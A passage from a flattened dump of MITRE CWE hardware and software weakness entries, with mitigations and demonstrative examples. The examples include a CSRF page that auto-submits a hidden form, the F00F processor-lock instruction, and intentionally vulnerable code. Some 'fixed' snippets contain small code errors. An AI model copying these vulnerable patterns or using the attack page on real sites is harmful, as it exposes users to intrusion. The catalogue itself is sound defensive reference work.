- Bypass Protection Mechanism - Once unlock credentials are compromised, an attacker can use the credentials to unlock the device and gain unauthorized access to the hidden functionalities protected by those credentials. - - - - - Integration - Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific. - - - Manufacturing - Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific. - - - - - This example shows how an attacker can take advantage of compromised credentials. - Suppose a semiconductor chipmaker, “C”, uses the foundry “F” for fabricating its chips. Now, F has many other customers in addition to C, and some of the other customers are much smaller companies. F has dedicated teams for each of its customers, but somehow it mixes up the unlock credentials and sends the unlock credentials of C to the wrong team. This other team does not take adequate precautions to protect the credentials that have nothing to do with them, and eventually the unlock credentials of C get leaked. - When the credentials of multiple organizations are stored together, exposure to third parties occurs frequently. - Vertical integration of a production company is one effective method of protecting sensitive credentials. Where vertical integration is not possible, strict access control and need-to-know are methods which can be implemented to reduce these risks. - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - - Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi - Intel Corporation - 2020-05-29 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Related_Attack_Patterns - - - - - The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory. - - Adversaries could bypass the secure-boot process and execute their own untrusted, malicious boot code. - As a part of a secure-boot process, the read-only-memory (ROM) code for a System-on-Chip (SoC) or other system fetches bootloader code from Non-Volatile Memory (NVM) and stores the code in Volatile Memory (VM), such as dynamic, random-access memory (DRAM) or static, random-access memory (SRAM). The NVM is usually external to the SoC, while the VM is internal to the SoC. As the code is transferred from NVM to VM, it is authenticated by the SoC's ROM code. - If the volatile-memory-region protections or access controls are insufficient to prevent modifications from an adversary or untrusted agent, the secure boot may be bypassed or replaced with the execution of an adversary's code. - - - - - - - Primary - - - - - - - - - - - Architecture and Design - This weakness can be introduced during hardware architecture or design but can be identified later during testing. - - - - - Access Control - Integrity - Modify Memory - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - High - - - - - Manual Analysis - Ensure the volatile memory is lockable or has locks. Ensure the volatile memory is locked for writes from untrusted agents or adversaries. Try modifying the volatile memory from an untrusted agent, and ensure these writes are dropped. - - High - - - Manual Analysis - - Analyze the device using the following steps: - - 1) Identify all fabric master agents that are active during system Boot Flow when initial code is loaded from Non-volatile storage to volatile memory. - 2) Identify the volatile memory regions that are used for storing loaded system executable program. - 3) During system boot, test programming the identified memory regions in step 2 from all the masters identified in step 1. - - Only trusted masters should be allowed to write to the memory regions. For example, pluggable device peripherals should not have write access to program load memory regions. - - Moderate - - - - - Architecture and Design - Ensure that the design of volatile-memory protections is enough to prevent modification from an adversary or untrusted code. - - - Testing - Test the volatile-memory protections to ensure they are safe from modification or untrusted code. - - - - - A typical SoC secure boot's flow includes fetching the next piece of code (i.e., the boot loader) from NVM (e.g., serial, peripheral interface (SPI) flash), and transferring it to DRAM/SRAM volatile, internal memory, which is more efficient. - The volatile-memory protections or access controls are insufficient. - The memory from where the boot loader executes can be modified by an adversary. - A good architecture should define appropriate protections or access controls to prevent modification by an adversary or untrusted agent, once the bootloader is authenticated. - - - - - CVE-2019-2267 - Locked memory regions may be modified through other interfaces in a secure-boot-loader image due to improper access control. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2267 - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-04-25 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Related_Attack_Patterns - - - Narasimha Kumar V Mangipudi - Lattice Semiconductor - 2021-10-20 - suggested content improvements - - - Hareesh Khattri - Intel Corporation - 2021-10-22 - provided detection method - - - - - The SameSite attribute for sensitive cookies is not set, or an insecure value is used. - The SameSite attribute controls how cookies are sent for cross-domain requests. This attribute may have three values: 'Lax', 'Strict', or 'None'. If the 'None' value is used, a website may create a cross-domain POST HTTP request to another website, and the browser automatically adds cookies to this request. This may lead to Cross-Site-Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens). - - - - - - - - - - - - - Implementation - This weakness occurs during implementation when the coder does not properly set the SameSite attribute. - - - Medium - - - Confidentiality - Integrity - Non-Repudiation - Access Control - Modify Application Data - Low - If the website does not impose additional defense against CSRF attacks, failing to use the 'Lax' or 'Strict' values could increase the risk of exposure to CSRF attacks. The likelihood of the integrity breach is Low because a successful attack does not only depend on an insecure SameSite attribute. In order to perform a CSRF attack there are many conditions that must be met, such as the lack of CSRF tokens, no confirmations for sensitive actions on the website, a "simple" "Content-Type" header in the HTTP request and many more. - - - - - Implementation - Set the SameSite attribute of a sensitive cookie to 'Lax' or 'Strict'. This instructs the browser to apply this cookie only to same-domain requests, which provides a good Defense in Depth against CSRF attacks. When the 'Lax' value is in use, cookies are also sent for top-level cross-domain navigation via HTTP GET, HEAD, OPTIONS, and TRACE methods, but not for other HTTP methods that are more like to cause side-effects of state mutation. - High - While this mitigation is effective for protecting cookies from a browser's own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie. - - - - - In this example, a cookie is used to store a session ID for a client's interaction with a website. The snippet of code below establishes a new cookie to hold the sessionID. - - let sessionId = generateSessionId() - let cookieOptions = { domain: 'example.com' } - response.cookie('sessionid', sessionId, cookieOptions) - - - Since the sameSite attribute is not specified, the cookie will be sent to the website with each request made by the client. An attacker who can potentially perform CSRF attack by using the following malicious page: - - <html> - - <form id=evil action="http://local:3002/setEmail" method="POST"> - <input type="hidden" name="newEmail" value="abc@example.com" /> - </form> - <script>evil.submit()</script> - </html> - - - - When the client visits this malicious web page, it submits a '/setEmail' POST HTTP request to the vulnerable website. Since the browser automatically appends the 'sessionid' cookie to the request, the website automatically performs a 'setEmail' action on behalf of the client. - To mitigate the risk, use the sameSite attribute of the 'sessionid' cookie set to 'Strict'. - - let sessionId = generateSessionId() - let cookieOptions = { domain: 'example.com', sameSite: 'Strict' } - response.cookie('sessionid', sessionId, cookieOptions - - - - - - - - - - - - - - - Michael Stepankin - Veracode - 2020-06-19 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Related_Attack_Patterns - - - - - Signals between a hardware IP and the parent system design are incorrectly connected causing security risks. - - Individual hardware IP must communicate with the parent system in order for the product to function correctly and as intended. If implemented incorrectly, while not causing any apparent functional issues, may cause security issues. For example, if the IP should only be reset by a system-wide hard reset, but instead the reset input is connected to a software-triggered debug mode reset (which is also asserted during a hard reset), integrity of data inside the IP can be violated. - - - - - - - - - - - - - Implementation - This weakness is introduced when integrating IP into a parent design. - - - - - Confidentiality - Integrity - Availability - Varies by Context - - - - - Testing - System-level verification may be used to ensure that components are correctly connected and that design security requirements are not violated due to interactions between various IP blocks. - - - - - Many SoCs use hardware to partition system resources between trusted and un-trusted entities. One example of this concept is the Arm TrustZone, in which the processor and all security-aware IP attempt to isolate resources based on the status of a privilege bit. This privilege bit is part of the input interface in all TrustZone-aware IP. If this privilege bit is accidentally grounded or left unconnected when the IP is instantiated, privilege escalation of all input data may occur. - - - // IP definition - module tz_peripheral(clk, reset, data_in, data_in_security_level, ...); - input clk, reset; - input [31:0] data_in; - input data_in_security_level; - ... - endmodule - // Instantiation of IP in a parent system - module soc(...) - ... - tz_peripheral u_tz_peripheral( - .clk(clk), - .rst(rst), - .data_in(rdata), - //Copy-and-paste error or typo grounds data_in_security_level (in this example 0=secure, 1=non-secure) effectively promoting all data to “secure”) - .data_in_security_level(1'b0), - ); - ... - endmodule - - In the Verilog code below, the security level input to the TrustZone aware peripheral is correctly driven by an appropriate signal instead of being grounded. - - // Instantiation of IP in a parent system - module soc(...) - ... - tz_peripheral u_tz_peripheral( - .clk(clk), - .rst(rst), - .data_in(rdata), - // This port is no longer grounded, but instead drive by the appropriate signal - .data_in_security_level(rdata_security_level), - ); - ... - endmodule - - - - - - Nicole Fern - Tortuga Logic - 2020-05-22 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations - - Hardware Block Incorrectly Connected to Larger System - - - - The product does not provide its - users with the ability to update or patch its - firmware to address any vulnerabilities or - weaknesses that may be present. - Without the ability to - patch or update firmware, consumers will be - left vulnerable to exploitation of any known - vulnerabilities, or any vulnerabilities that - are discovered in the future. This can expose - consumers to permanent risk throughout the - entire lifetime of the device, which could be - years or decades. Some external protective - measures and mitigations might be employed to - aid in preventing or reducing the risk of - malicious attack, but the root weakness cannot - be corrected. - - - - - - Primary - - - - - - - - - - - Requirements - Requirements development might not consider the importance of updates over the lifetime of the product, or might not choose the ability due to concerns such as expense or speed to market. - - - Architecture and Design - Lack of planning during architecture development and design, or external pressures such as speed to market, could ignore the capability to update. - - - Implementation - The weakness can appear through oversight during implementation. - - - - - Confidentiality - Integrity - Access Control - Authentication - Authorization - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - DoS: Crash, Exit, or Restart - Medium - If an attacker can identify an exploitable vulnerability in one device that has no means of patching, the attack may be used against an entire class of devices. - - - - - Manual Analysis - Create a new installable boot image of the current build with a minor version number change. Use the standard installation method to update the boot image. Verify that the minor version number has changed. Create a fake image. Verify that the boot updater will not install the fake image and generates an invalid image error message. - High - - - Architecture or Design Review - Check the consumer or maintainer documentation, the architecture/design documentation, or the original requirements to ensure that the documentation includes details for how to update the firmware. - Moderate - - - Manual Dynamic Analysis - Determine if there is a lack of a capability to update read-only memory structure. This could manifest as a difference between the latest firmware version and current version within the device. - High - - - - - Requirements - Specify requirements to provide the ability to update the firmware. - - - Architecture and Design - Design the device to allow for updating the firmware. - - - Implementation - Implement the necessary functionality to allow the firmware to be updated. - - - - - A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes. - The refrigerator has no means of patching and is hacked becoming a spewer of email spam. - The device automatically patches itself and provides considerable more protection against being hacked. - - - - - CVE-2020-9054 - Chain: network-attached storage (NAS) device has a critical OS command injection (CWE-78) vulnerability that is actively exploited to place IoT devices into a botnet, but some products are "end-of-support" and cannot be patched (CWE-1277). [REF-1097] - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9054 - - - REF-1095 - hardware "smart lock" has weak key generation, allowing attackers to steal the key by BLE sniffing, but the device's firmware cannot be upgraded [REF-1095]. - https://www.theregister.com/2019/12/11/f_secure_keywe/ - - - - - - - - - The "firmware" term does not have a single commonly-shared definition, so there may be variations in how this CWE entry is interpreted during mapping. - - - - Paul A. Wortman - Wells Fargo - 2020-05-13 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-12-10 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Maintenance_Notes - - - Paul A. Wortman - Wells Fargo - 2021-10-12 - provided detection methods and observed examples - - - - - Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy. - - The physical structure of a device, viewed at high enough magnification, can reveal the information stored inside. Typical steps in IC reverse engineering involve removing the chip packaging (decapsulation) then using various imaging techniques ranging from high resolution x-ray microscopy to invasive techniques involving removing IC layers and imaging each layer using a scanning electron microscope. - The goal of such activities is to recover secret keys, unique device identifiers, and proprietary code and circuit designs embedded in hardware that the attacker has been unsuccessful at accessing through other means. These secrets may be stored in non-volatile memory or in the circuit netlist. Memory technologies such as masked ROM allow easier to extraction of secrets than One-time Programmable (OTP) memory. - - - - - - - - - - - - - Architecture and Design - - - - - Confidentiality - Varies by Context - A common goal of malicious actors who reverse engineer ICs is to produce and sell counterfeit versions of the IC. - - - - - Architecture and Design - The cost of secret extraction via IC reverse engineering should outweigh the potential value of the secrets being extracted. Threat model and value of secrets should be used to choose the technology used to safeguard those secrets. Examples include IC camouflaging and obfuscation, tamper-proof packaging, active shielding, and physical tampering detection information erasure. - - - - - Consider an SoC design that embeds a secret key in read-only memory (ROM). The key is baked into the design logic and may not be modified after fabrication causing the key to be identical for all devices. An attacker in possession of the IC can decapsulate and delayer the device. After imaging the layers, computer vision algorithms or manual inspection of the circuit features locate the ROM and reveal the value of the key bits as encoded in the visible circuit structure of the ROM. - - - - - - - - - - - - This entry is still under development and will continue to see updates and content improvements. It is more attack-oriented, so it might be more suited for CAPEC. - - - - Nicole Fern - Tortuga Logic - 2020-05-20 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, References, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result. - Many cryptographic hardware units depend upon other hardware units to supply information to them to produce a securely encrypted result. For example, a cryptographic unit that depends on an external random-number-generator (RNG) unit for entropy must wait until the RNG unit is producing random numbers. If a cryptographic unit retrieves a private encryption key from a fuse unit, the fuse unit must be up and running before a key may be supplied. - - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - The decision to continue using a cryptographic unit even though the input units to it are not producing valid data will compromise the encrypted result. - - - - - Access Control - Confidentiality - Integrity - Availability - Accountability - Authentication - Authorization - Non-Repudiation - Varies by Context - - - - - Architecture and Design - Best practices should be used to design cryptographic systems. - - - Implementation - Continuously ensuring that cryptographic inputs are supplying valid information is necessary to ensure that the encrypted output is secure. - - - - - - The following pseudocode illustrates the weak encryption resulting from the use of a pseudo-random-number generator output. - - - If random_number_generator_self_test_passed() == TRUE - then Seed = get_random_number_from_RNG() - else Seed = hardcoded_number - - - In the example above, first a check of RNG ready is performed. If the check fails, the RNG is ignored and a hard coded value is used instead. The hard coded value severely weakens the encrypted output. - - If random_number_generator_self_test_passed() == TRUE - then Seed = get_random_number_from_RNG() - else enter_error_state() - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - Cryptographic Primitives used without Successful Self-Test - - - - Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore "wraps around" to a very small, negative, or undefined value. - - - - - - - - Primary - - - - - - - - Due to how addition is performed by computers, if a primitive is incremented past the maximum value possible for its storage space, the system will not recognize this, and therefore increment each bit as if it still had extra space. Because of how negative numbers are represented in binary, primitives interpreted as signed may "wrap" to very large negative values. - - - - Implementation - - - Medium - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Instability - This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. - - - Integrity - Modify Memory - If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. - - - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. - - - - - Requirements specification: The choice could be made to use a language that is not susceptible to these issues. - - - Architecture and Design - Provide clear upper and lower bounds on the scale of any protocols designed. - - - Implementation - Perform validation on all incremented variables to ensure that they remain within reasonable bounds. - - - - - The following image processing code allocates a table for images. - - img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... - - This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). - - - - - Wrap-around error - - - MEM07-C - Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t - - - SFP1 - Glitch in computation - - - - - - - - - - - - The relationship between overflow and wrap-around needs to be examined more closely, since several entries (including CWE-190) are closely related. - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Background_Details - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations, References - - - - - A product's hardware-based access control check occurs after the asset has been accessed. - - The product implements a hardware-based access control check. The asset should be accessible only after the check is successful. If, however, this operation is not atomic and the asset is accessed before the check is complete, the security of the system may be compromised. - - - - - - - - - - - - - - - - Implementation - - - - - Access Control - Confidentiality - Integrity - Modify Memory - Read Memory - Modify Application Data - Read Application Data - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - Implementation - Implement the access control check first. Access should only be given to asset if agent is authorized. - - - - - Assume that the module foo_bar implements a protected register. The register content is the asset. Only transactions made by user id (indicated by signal usr_id) 0x4 are allowed to modify the register contents. The signal grant_access is used to provide access. - - module foo_bar(data_out, usr_id, data_in, clk, rst_n); - output reg [7:0] data_out;; - input wire [2:0] usr_id; - input wire [7:0] data_in; - input wire clk, rst_n; - wire grant_access; - always @ (posedge clk or negedge rst_n) - begin - if (!rst_n)data_out = 0;elsedata_out = (grant_access) ? data_in : data_out;assign grant_access = (usr_id == 3’h4) ? 1’b1 : 1’b0;endendmodule - - This code uses Verilog blocking assignments for data_out and grant_access. Therefore, these assignments happen sequentially (i.e., data_out is updated to new value first, and grant_access is updated the next cycle) and not in parallel. Therefore, the asset data_out is allowed to be modified even before the access control check is complete and grant_access signal is set. Since grant_access does not have a reset value, it will be meta-stable and will randomly go to either 0 or 1. - - Flipping the order of the assignment of data_out and grant_access should solve the problem. The correct snippet of code is shown below. - always @ (posedge clk or negedge rst_n) - begin - if (!rst_n)data_out = 0;elseassign grant_access = (usr_id == 3’h4) ? 1’b1 : 1’b0;data_out = (grant_access) ? data_in : data_out;end - endmodule - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description, Related_Attack_Patterns - - - - - Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed. - - If the instruction set architecture (ISA) and processor logic are not designed carefully, and tested thoroughly, certain combinations of instructions may lead to locking the processor or other unexpected and undesirable behavior. Upon encountering unimplemented instruction opcodes or illegal instruction operands the processor should throw an exception and carry on without negatively impacting security. However, specific combinations of legal and illegal instructions may cause unexpected behavior with security implications such as allowing unprivileged programs to completely lock the CPU. - - Some examples are the Pentium f00f bug, MC6800 HCF, the Cyrix comma bug, and more generally other "Halt and Catch Fire" instructions. - - - - - - - - - - - - - Architecture and Design - Unexpected behavior from certain instruction combinations can arise from bugs in the ISA - - - Implementation - Unexpected behavior from certain instruction combinations can arise because of implementation details such as speculative execution, caching etc. - - - - - Integrity - Availability - Varies by Context - - - - - Testing - Implement a rigorous testing strategy that incorporates randomization to explore instruction sequences that are unlikely to appear in normal workloads in order to identify halt and catch fire instruction sequences. - - - Patching and Maintenance - Patch operating system to avoid running Halt and Catch Fire type sequences or to mitigate the damage caused by unexpected behavior. See [REF-1108]. - - - - - The Pentium F00F bug is a real-world example of how a sequence of instructions can lock a processor. The “cmpxchg8b” instruction compares contents of registers with a memory location. The operand is expected to be a memory location, but in the bad code snippet it is the eax register. Because the specified operand is illegal, an exception is generated, which is the correct behavior and not a security issue in itself. However, when prefixed with the “lock” instruction, the processor deadlocks because locked memory transactions require a read and write pair of transactions to occur before the lock on the memory bus is released. The exception causes a read to occur but there is no corresponding write, as there would have been if a legal operand had been supplied to the cmpxchg8b instruction. - lock cmpxchg8b eax - - - - - CVE-1999-1476 - A bug in some Intel Pentium processors allow DoS (hang) via an invalid "CMPXCHG8B" instruction, causing a deadlock - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476 - - - - - - - - - - - - Nicole Fern - Tortuga Logic - 2020-05-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Name, Observed_Examples - - Sequence of Processor Instructions Leads to Unexpected Behavior (Halt and Catch Fire) - - - - Immutable data, such as a first-stage bootloader, device identifiers, and "write-once" configuration settings are stored in writable memory that can be re-programmed or updated in the field. - - Security services such as secure boot, authentication of code and data, and device attestation all require assets such as the first stage bootloader, public keys, golden hash digests, etc. which are implicitly trusted. Storing these assets in read-only memory (ROM), fuses, or one-time programmable (OTP) memory provides strong integrity guarantees and provides a root of trust for securing the rest of the system. Security is lost if assets assumed to be immutable can be modified. - - - - - - - - - - - - - - Implementation - Keys, code, configuration settings, and other data should be programmed in write-once or read-only memory instead of writable memory. - - - - - Integrity - Varies by Context - - - - - Implementation - All immutable code or data should be programmed into ROM or write-once memory. - - - - - Cryptographic hash functions are commonly used to create unique fixed-length digests used to ensure the integrity of code and keys. A golden digest is stored on the device and compared to the digest computed from the data to be verified. If the digests match, the data has not been maliciously modified. If an attacker can modify the golden digest they then have the ability to store arbitrary data that passes the verification check. Hash digests used to verify public keys and early stage boot code should be immutable, with the strongest protection offered by hardware immutability. - - - - - - - - - This entry is still under development and will continue to - see updates and content improvements. - - - As of CWE 4.3, CWE-1282 and CWE-1233 are being investigated - for potential duplication or overlap. - - - - - Nicole Fern - Tortuga Logic - 2020-05-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Name - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - Assumed-Immutable Data Stored in Writable Memory - - - - The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary. - - A System-on-Chip (SoC) implements secure boot or verified boot. During this boot flow, the SoC often measures the code that it authenticates. The measurement is usually done by calculating the one-way hash of the code binary and extending it to the previous hash. The hashing algorithm should be a Secure One-Way hash function. The final hash, i.e., the value obtained after the completion of the boot flow, serves as the measurement data used in reporting or in attestation. The calculated hash is often stored in registers that can later be read by the party of interest to determine tampering of the boot flow. A common weakness is that the contents in these registers are modifiable by an adversary, thus spoofing the measurement. - - - - - - - - - - - - - Architecture and Design - Such issues can be introduced during hardware architecture or design and can be identified later during Testing or System Configuration phases. - - - Implementation - If the access-controls which protecting the reporting registers are misconfigured during implementation, this weakness can arise. - - - - - Confidentiality - Read Memory - Read Application Data - - - - - Architecture and Design - - Measurement data should be stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent. - - - - - - The SoC extends the hash and stores the results in registers. Without protection, an adversary can write their chosen hash values to these registers. Thus, the attacker controls the reported results. - - To prevent the above scenario, the registers should have one or more of the following properties: - - Should be Read-Only with respect to an adversary - Cannot be extended or modifiable either directly or indirectly (using a trusted agent as proxy) by an adversary - Should have appropriate access controls or protections - - - - - - - - - - - - - This entry is still in development and will continue to see updates and content improvements. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-04-25 - - - CWE Content Team - MITRE - 2020-08-20 - updated References, Related_Attack_Patterns - - - - - The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties. - - Specified quantities include size, length, frequency, price, rate, number of operations, time, and others. Code may rely on specified quantities to allocate resources, perform calculations, control iteration, etc. When the quantity is not properly validated, then attackers can specify malicious quantities to cause excessive resource allocation, trigger unexpected failures, enable buffer overflows, etc. - - - - - - - - - - Implementation - - - - - Other - Varies by Context - Since quantities are used so often to affect resource allocation or process financial data, they are often present in many places in the code. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - High - - - - - This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated. - - ...public static final double price = 20.00;int quantity = currentUser.getAttribute("quantity");double total = price * quantity;chargeUser(total);... - - The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited. - - - This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares. - - ...#define MAX_DIM 100... - /* board dimensions */ - - int m,n, error;board_square_t *board;printf("Please specify the board height: \n");error = scanf("%d", &m);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}printf("Please specify the board width: \n");error = scanf("%d", &n);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}if ( m > MAX_DIM || n > MAX_DIM ) {die("Value too large: Die evil hacker!\n");}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));... - - While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program. - - - - - CVE-2008-1440 - lack of validation of length field leads to infinite loop - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440 - - - CVE-2008-2374 - lack of validation of string length fields allows memory consumption or buffer over-read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374 - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-06-24 - - - - - The product receives input that is expected to specify an index, position, or offset into an indexable resource such as a buffer or file, but it does not validate or incorrectly validates that the specified index/position/offset has the required properties. - - Often, indexable resources such as memory buffers or files can be accessed using a specific position, index, or offset, such as an index for an array or a position for a file. When untrusted input is not properly validated before it is used as an index, attackers could access (or attempt to access) unauthorized portions of these resources. This could be used to cause buffer overflows, excessive resource allocation, or trigger unexpected failures. - - - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - High - - - - - The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index. - - - - /* capture the sizes of all messages */ - int getsizes(int sock, int count, int *sizes) { - ...char buf[BUFFER_SIZE];int ok;int num, size; - - // read values from socket and added to sizes array - while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ - - - // continue read from socket until buf only contains '.' - if (DOTLINE(buf))break; - else if (sscanf(buf, "%d %d", &num, &size) == 2)sizes[num - 1] = size; - - }... - - } - - In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. - - - - /* capture the sizes of all messages */ - int getsizes(int sock, int count, int *sizes) { - ...char buf[BUFFER_SIZE];int ok;int num, size; - - // read values from socket and added to sizes array - while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ - - - // continue read from socket until buf only contains '.' - if (DOTLINE(buf))break; - else if (sscanf(buf, "%d %d", &num, &size) == 2) { - if (num > 0 && num <= (unsigned)count)sizes[num - 1] = size; - else - - - /* warn about possible attempt to induce buffer 